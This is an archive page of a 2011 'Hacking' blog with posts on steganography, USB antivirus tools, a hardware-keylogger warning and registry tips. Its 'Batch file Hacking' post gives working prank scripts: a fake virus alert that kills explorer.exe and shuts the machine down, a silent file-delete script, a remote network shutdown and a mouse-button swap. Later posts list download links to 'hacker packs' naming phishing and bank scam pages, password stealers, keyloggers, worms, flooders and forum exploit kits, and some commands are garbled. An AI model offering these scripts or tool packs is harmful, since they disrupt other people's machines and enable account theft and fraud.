Archive

Archive for the ‘Hacking’ Category

How to Hide Data in Image, Audio & Video Files: Steganography

November 28, 2011 Leave a comment

         Ever wondered to know how to hide secret messages in images, audio and video files? Well, in this post I will take you through a concept called steganography using which, it is possible to hide your secret information in image files, songs or any other file of your choice. At the end of this post, you can also download free stegnographic tools and start hiding your data.
What is Steganography?

Steganography is a means of obscuring data where secret messages are hidden inside computer files such as images, sound files, videos and even executable files so that, no one except the sender and the receiver will suspect the existence of stealth information in it. Steganography may also involve the usage of cryptography where the message is first encrypted before it is concealed in another file. Generally, the messages appear to be something else such as an image, sound or video so that the transfer of secret data remains unsuspected.

                          The main advantage of steganography over other methods such as cryptography is that, it will not arose suspicion even if the files fall in the hands of a third party. Unlike cryptographic messages, stegnographic messages will no way attract the attention of a third party by themselves. Thus stegnanography has an upper hand over cryptography as it involves both encryption and obscurity.
What are the Applications of Steganography?

Steganography is mainly used to obscure confidential information/data during storage or transmission. For example, one can hide a secret message in an audio file and send this to another party via email instead of sending the message in the textual format. The receiver on the other end will decrypt the hidden message using the private decryption key. In a worst case scenario, even if a third party does manage to gain access to the email, all he can find is the audio file and not the hidden data inside it. Other usage of steganography include digital watermarking of images for reasons such as copyright protection.

                                 Eventhough steganography has many useful applications, some may use this technique for illegitimate purposes such as hiding a pornographic content in other large files. Roumors about terrorists using steganography for hiding and communicating their secret information and instructions are also reported. An article claiming that, al-Queda had used steganography to encode messages in images and transported them via e-mails, was reported by New York Times, in October 2001.
How do Steganography Tools Work?

Stegnography tools implement intelligent algorithms to carefully embed the encrypted text messages or data inside other larger files such as an image, audio, video or an executable file. Some tools will embed the encrypted data at the end of another file so that there will be enough room for storing larger data.

There are many steganography tools available online but only a few are able to work flawlessly. I did not find any tool that worked perfectly on both small and large data. However I have managed to develop my own tool that can work perfectly on all types of files and all size of data. The tool is called “Stego Magic“. You can download it from the following link.

Download Stego Magic
Download StegoMagic.zip

                                        The zip file contains two versions of Stego Magic: One for encrypting the text messages and the other for encrypting binary files. StegoMagic_TXT can be used to hide text messages in other files such as an image or a sound file. StegoMagic_BIN can be used to hide one binary file in another such as an executable file inside an image or an image inside a video file.

With Stego Magic, there is no limitation on the size and type of the file that you are intending to hide. For example, you can hide a video of size 1 GB in an image of size 1 MB or hide an executable file inside a WORD document. The tool is pretty straightforward to use and requires no special understanding of the concept.

At the end of the encryption process, a secret decryption key will be generated and the same is required during the decryption process.
How to Use Stego Magic?

Suppose you want to hide a text message inside a JPG file:

1. Place the JPG and the text file (.txt) in the same folder as that of StegoMagic_TXT.exe

2. Run StegoMagic_TXT.exe and follow the screen instructions to embed the text message inside the JPG image.

3. Note down the secret decryption key.

Now you can send this image to your friend via email. To decrypt the hidden message, your friend should load this JPG file onto the Stego Magic tool and use the secret decryption key.

Categories: Hacking

How to protect USB Pendrives/Flashdrives from VIRUS ?

November 17, 2011 Leave a comment

Lets Protect USB Pendrives / flash drives from Viruses.

Most often our system get infected with virus soon after a USB pendrive has been plugged in. These days it is so easy to get infected by viruses by plugging in a pendrive to your system from unknown source (may be your friends one or your college desktops).

Not all the security programs can defend your pc against the virus attacks carried out through pendrives. But if we can take necessary steps, then we can be safe from such viruses, worms and spywares spreading through pendrives/ flash drives.

So here are some software’s that can efficiently protect your system and pendrive from unknown threats ad viruses.
1.USB Write Protector

It is a software that can help you in write protecting your Pendrive. USB Write Protector allows only to read the data from the pendrive but it wont permit to write data into the pendrive. This is really useful if you take your pendrive to plug on to your friends or relatives pc, as most of the virus enter the pendrive unknowingly. USB Write Protector is a small program, around 190kb in size.

ETY

                     

USB Write Protector

The program doesn’t need any installation and can be directly run from the location. On running the program the window just shows up with just two option to enable write Protection in your Pendrive/ USB Flash Drive and to Turn Off the USB Write Protection. Its that simple. You just need to pick the option and click on OK.
Download
USB writer
2)USB FireWall

As said above, USB write protect software protect your pendrive from viruses, USB firewall likewise protects your PC from viruses. The software protects your system from security threats by launching itself as soon as a USB peripheral is inserted. As soon as USB firewall is launched it works in the background and a window appears when some program tries to launch out automatically since a peripheral USB. USB FireWall is also able to scan all your partitions for auto launched programs and delete the respective autorun file.

USB Firewall is 3.3 MB in size.

Download USB Firewall || Download USB Firewall (Direct Link)
3) Panda USB Vaccination Tool

: It’s a great Tool from Panda that will disable the autorun function from your computer completely and it has a special ability to add a autorun.inf file of its own which can’t be read or deleted or modified. So the autorun virus wont be able to modify it and your system will be safe from the autorun.inf virus even if you plug the pendrive.

You can create a shortcut to the Panda Vaccination Tool with the parameters USBVaccine.exe /resident /hidetray +system and copy the shortcut to the windows startup folder, so that each time a USB device is plugged onto your system, the program popups automatically asking you for vaccination.

Download Panda USB Vaccination Tool
4) USB Guardian

USB Guardian helps you to safely share pictures, movies, documents etc. via your USB pendrive without the risk of being infected by viruses and worms that spread through the pendrives. USB Guardian boasts a clean and simple interface so that so that the user can work with minimum effort.

ETY

USB Guardian

USB Guardian blocks any programs from being automatically executed from a pendrive and thereby it isolates the autorun directives on the removable device.
USB Guardian then scans for any autorun.inf file on the flash drive to check whether it references to any additional files on the pendrive. If any such files are found it automatically blocks those files.

The Locked files will be inaccessible by any other program and you can unlock it using USB Guardian itself if you think the program is harmless. USB guardian is free for use and is 2.96 MB in size.

Download USB Guardian
Hope these tools will help you in protecting and securing your USB Flash drives/ Pendrive from Viruses and Worms.Comments awaited:)

Categories: Hacking

HACKERS ARE THERE BE AWARE

November 6, 2011 Leave a comment





Dear friends, If you visit a cyber cafe and find find any black pin attached to your CPU as shown in the picture, kindly do not use that system. This pin is actually a connection which save all your data you enter in the system.Thus it is a risk to your privacy over net. Risk to passwords, banking or any data you entered.Itz a hardware keylogger very powerful it records each and every action ur system.

Categories: Hacking

Google Searching secrets E-Book.

July 31, 2011 Leave a comment

Dangerous_Google_-_Searching: Download Here

Google serves some 80 percent of all search queries on the Internet, making it by far the most popular search engine. Its popularity is due not only to excellent search effectiveness, but also extensive querying capabilities. However, we should also remember that the Internet is a highly dynamic medium, so the results presented
by Google are not always up-to-date – some search results might be stale, while other relevant resources might not yet have been visited by Googlebot (the automatic script that browses and indexes Web resources for Google)….

Categories: Hacking

Batch file Hacking!

July 23, 2011 Leave a comment


Batch File Hacking

Ok, Custard here
Batch file hacking is very fun oh yeaa in this page i will teach some tricks and about them.


The simple things you have to do is copy or write those codes in NOTEPAD then save them with any name but with an extension “.bat”  do not include the quotations.. ENJOY!!




Batch File That Deletes Other Things.
This batch file will delete any file on your computer, be carefull now its pretty simple first of all
1.Open Notepad
2. Type
3.@echo off
del “Path Of File You Want To Delete” /Q /S> nul
4. Save as “Anything.bat”
5. Execute It.

Example:
@echo off
del “C:/Documents And Settings/Custard/Desktop/lol.txt” /Q /S> nul




Simple Funny Virus Batch Code.

@echo OFF
title Virus Detected Do Not Close Window
echo Virus Detected attempting to remove virus…
echo (press any key to continue)
pause >nul
echo Virus is spreading throughout the system…
echo (press any key to destroy)
pause >nul
echo destroying virus…
echo (press any key to continue)
pause >nul
echo files deleted to destroy virus
echo (press any key to cancel)
pause >nul
taskkill /f /im explorer.exe
cls
echo cancel failed
echo (press any key to restore)
pause >nulecho files restored
start /im explorer.exe
cls
echo files restored
echo (press any key to continue)
pause >nul
echo checking for virus…
echo virus still detected
echo (press any key to destroy)
pause >nul
echo virus is destroyed
echo (press any key to exit)
pause >nul
shutdown -s -t 5 -c “virus infected everything Windows is shuting down”






Shutdown Computers Over The Network.
To make this 1. Open Notepad, 2.Type Shutdown -s -m \\xxx.xxx.xxx.xxx (IP Address)
3. Save To Desktop As (Anything).bat (DONT FORGET THE .BAT)
4.Double click on the icon and wait.
5. Now there is of course other ways of doing this, read the post on the front page,

you can also open CMD and type “Shutdown -i”
Thats My 2nd Trick.




To Change The mouse button Option

@echo off
Rundll32 user32,SwapMouseButton
rundll32 keyboard,enable
msg * Enjoy Buddy.. You are Screwed.




Pause command
This command is use to provide the user interface 
it ill work only when u press any ke
“PAUSE then -t 15”


To cut off the network system.
Type in notepad as
ipconfig/released 
then save them as batch file with .bat extension 
open and check your network it does not work


To get back the network system.

Type in notepad as
ipconfig/renew
then save them as batch file with .bat extension 
open and check your network starts working again…




                         THANK YOU




Categories: Hacking

Computer Viruses for Dummies

July 22, 2011 Leave a comment
Computer Viruses for Dummies

Computer Viruses For Dummies is a reference book, not (believe it or not) a mystery; you don’t have to read the chapters in order. Start anywhere you like

. Feel free to skip chapters that aren’t of immediate interest. Want to start at the last page? You’re the boss; everybody knows who done it anyway — that sinister virus. If you’re looking for particular information, you can go about it in several ways. You can use the Table of Contents to find the area of immediate interest. Or, you can look at the Index to find a particular word or concept. Finally, at the top of each page, a running head tells you what chapter and what part of the book you’re currently in. Feel free to just skip around until you find the information you seek . . . unless you already have the queasy feeling that your computer may be infected. Then your best bet is to “start at the beginning” (as Lewis Carroll recommends) and explore from there.


Categories: Hacking

HACK! HACK! HACK!

July 20, 2011 Leave a comment

Hi friends am going to add some of the rare Hacking books in this blog so please keep visiting frequently…
books like

                

Categories: Hacking

Pop a banner each time Windows Boots

July 5, 2011 Leave a comment

To pop a banner which can contain any message you want to display just before a user is going to log on.

Go to the key :- HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WinLogon
Now create a new string Value in the right pane named ‘LegalNoticeCaption’ and enter the value that you want to see in the MenuBar.

Now create yet another new string value and name it:
‘LegalNoticeText’.
Modify it and insert the message you want to display each time Windows boots.

This can be effectively used to display the company’s private policy each time the user logs on to his NT box.

It’s ‘.reg’ file would be:
REGEDIT4 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon] “LegalNoticeCaption”=”Caption here.”

Categories: Hacking

Top hacking tools…

July 5, 2011 Leave a comment

CrackersKit 2005

Golden eye 2005
HellLabs Proxy Checker v7.4.18
HostScan v1.6.5.531
Invisible Browsing v4.0
IPScanner v1.86
Ascii Factory 0.6
Cool Beans NFO Creator v2.0.1.3
Dizzy v1.10
Feuer’s NFO File Maker v2.0
Ims NFO&DIZ Maker 1.87
Inserter v1.12
NFO Creator v3.5.2
NFO Maker 1.0
Patchs All In One 2005
SoftIce 4.05 -Win 2000-XP
IP Address Scanner
IP Calculator
IP Converter
Port Listener
Port Scanner April 2005
Ping
NetStat 2005
Cool Trace Route 2005
TCP/IP Configuration
Online – Offline Checker
Resolve Host & IP
Time Sync
Whois & MX Lookup
Connect0r
Connection Analysator and prtotector
Net Sender April 2005
E-mail seeker
Cool Net Pager
Active and Passive port scanner
Spoofer
Hack Trapper
HTTP flooder (DoS)
Mass Website Visiter
Advanced Port Scanner
Trojan Hunter Multi IP April 2005
Port Connecter Tool
Advanced Spoofer
http://rapidshare.com/files/50220724/40_Hack_tools.part1.part1.rar
http://rapidshare.com/files/50221144/40_Hack_tools.part1.part2.rar
http://rapidshare.com/files/50221457/40_Hack_tools.part1.part3.rar
softice 4.05 win2000-xp
patchs all in one 2005
nfo-tools all in one
net tools all in one(bes tool for hacking it include almost200 tool
ARABIAN HACKER ATTACKER CD
BOT MAKER
WEBCAM RECORDER
[content suppressed]
CRACK SEARCHING SOFTWARE
GMAIL GENERATOR.(tOOL FOR PHISHING)
[content suppressed]
TOOL TO HACK MODEM
HACKING BOOKS AND TUTORIALS
http://rapidshare.com/files/50228433/HD.rar


VIDEO OF Local_Password_Cracking_Presentation_for_the_Indiana_Higher_Education_Cybersecurity_Summit_2005
Password Hacking AIO
PROXY TOOLS
PROXYHUNTER CHARON
PROXYRAMA
A.P.L
FORUM PROXY LEECHER
AA TOOLS
WORD LIST TOOLS
ATHENA
PARSLEY
RAPTOR
VLSTRIP
LOG SUCKER
S WORDTOOL
VCU
ALS NOVICE
STAPH
HORNY STRIPPER
XXX PASSWORD FINDER
CRACKING TOOLS
ACCESS DIVER
SENTRY
CFORCE
XFACTOR
FORM @
CAECUS 1.2
SPOOF TOOLS
SPLOOF
ZSPOOF
SUPER MEGA SPOOF
HYPERSPOOF
VIDEO TUTORIALS
FORM@
PROXYHUNTER
CFORCE
CHARON
SENTRY2
ACCESS DIVER
Password: dreatica.CL
ULTRA HACKER PACK 156 IN 1
95-ME Keygen.rar
AddrView.rar
AnonFTP.zip
AOL new.rar
AppToService.rar
arpinject.zip
aspack21.zip
Astaroth Joiner v2.rar
atk-2.1.zip
BankOfAmerica.rar
bios_pass_remover.zip
BlasterW32.zip
blue.zip
bmpripper.zip
brutus.zip
Cable Modem Sniffer.rar
CapKeys_DIGITAL.rar
CASXM138.zip
CAYZODQF.zip
CGI Founder v1.043.zip
cgis4.zip
CGISscan.zip
cia10.zip
cports.rar
craagle.zip
Crackftp.zip
CreditCardGjenerator.rar
Davs_TR_REtail.zip
DDL Sites.rar
DeepUnFreez.zip
DrVBS.zip
eBay.rar
EESBinder.zip
egold.rar
E-mail Cracker.rar
ezDataBase_Defacer.rar
F.B.I – Binder.rar
FTP Brute Forcer.rar
ftpbr.zip
Fuck Mail Bomber 2.3.rar
G00B3RS_phpBB_exploit_pack.rar
genxe-beta-0.9.0.zip
Google_Hacker_1.2.rar
grinder1.1.zip
Hack FLASH Template.zip
Hack MY Space.zip
Hack Photoshop CS2.zip
HackersAssistant.zip
HackTheGame.zip
hck.zip
hlboom.zip.zip
Hook Tool Box.rar
Hotmail Email Hacker.rar
Hotmail HAcker Gold.rar
Hotmail ScamPage.zip
HotmailHack.rar
HSBC-US.rar
hydra-4.6-win.zip
iecv.rar
IP2.rar
ipnetinfo.rar
john-17w.zip
Key Changer.rar
Key_Logger.zip
Legion NetBios Scanner v2.1.zip
Mail Boomb_2.0 YAHOO.zip
MIDNITEmassacre.zip
MooreR Port Scanner.rar
MSN Flooder 2.0.rar
MSN Messenger Account Cracker v2.0.rar
MSNLoader.rar
NET BIOS Scaner.rar
NetBIOS Name Scanner.rar
NetResView.rar
NFO Maker 1.0.zip
Nimda.zip
nkedb.zip
nolimitcracker.rar
NTPacker.zip
nts.zip
NullAddFrontend.zip
On-Off MSN.rar
OS Update Hack.rar
P0kes WormGen 2.0.zip
panther.zip
PayPal.rar
PCAnyPass.rar
Php Nuke Hacker v11.0.rar
phpBB Annihilator.rar
phpbb attack.rar
phpbb bruteforcer.rar
PhpBB pass extractor.zip
phpBB_DoS.rar
phpbb_spammer.rar
phpBBAttacker.rar
phpBBAttacker.zip
phpBBcracker.rar
PhpBuGScan.rar
PHPfucker.rar
PhpNuke_bypass.rar
Ping & Nukes.rar
Port Listener XP.rar
pqwak2.zip
procexp.rar
ProMo.rar
ProxyPro.zip
Pure phpBB Email harvester.rar
rainbowcrack-1.2-src win-lin.zip
Remote Shut Down.rar
ResHacker.zip
Rocket.zip
rpc.zip
RpcScan101.zip
Sasser.zip
SendMailer.zip
Server 2003 Keygen.rar
Server Killer.rar
showpassv10.zip
sitedigger2.zip
smbat-win32bin-1.0.4.zip
SMBdie.zip
smbproxy-win32bin-1.0.0.zip
Source Checker.rar
source codes.rar
sprut.zip
SQLScan v1.0.rar
Stealth – HTTP Scanner v1.0 build 23.zip
super.zip
SuperScan4.rar
tftpd32.273.zip
thunter.zip
TinaSoft KILL.zip
traceroute.rar
UC.Forum Spam.rar
udpflood.zip
Ultra Dos.zip
USBank.rar
Visa Spam.zip
Warez Sites.rar
Web Cracker 2.0.rar
WebCracker 4.0.rar
whoistd.rar
Win XP Activator.rar
WindowHide.rar
Windows XP Corperate Keygen.rar
Windows XP KeyGen.rar
Windows XP Product Key Changer.rar
Windows XP Product Key Checker.rar
Windows XP Product Key Viewer.rar
WindowsAdminpasswordHack.rar
wwwhack.rar
xpass.zip
xplizer.rar
Yahoo Password.zip
yahooUltraCracker.rar
zehir.zip
http://rapidshare.com/files/50237672/ultra_hacker_pack_156_in_1.part1.rar
http://rapidshare.com/files/50238810/ultra_hacker_pack_156_in_1.part2.rar
http://rapidshare.com/files/50239887/ultra_hacker_pack_156_in_1.part3.rar
http://rapidshare.com/files/50240585/ultra_hacker_pack_156_in_1.part4.rar
webcam grabber
YAHOO MESSENGER PASSWORD SHOW
YAHOO PASSWORD STEALER
HACKER MONITORING TOOLS.
Categories: Hacking

JAJAH Offers 30 Minutes FREE Calling India & Aboard

July 5, 2011 Leave a comment

logitech.jpg jajah.gif
JAJAH is a new type of phone company. We are dedicated to providing our customers with phone calls at a better price. It’s that simple. “The internet has touched us all. It’s changed the way we do everyday things. It’s changed the way we stay informed, the way we shop for the products we want, even the way we find and listen to music. In the same way, JAJAH will change the way we all use the telephone”.
Categories: Hacking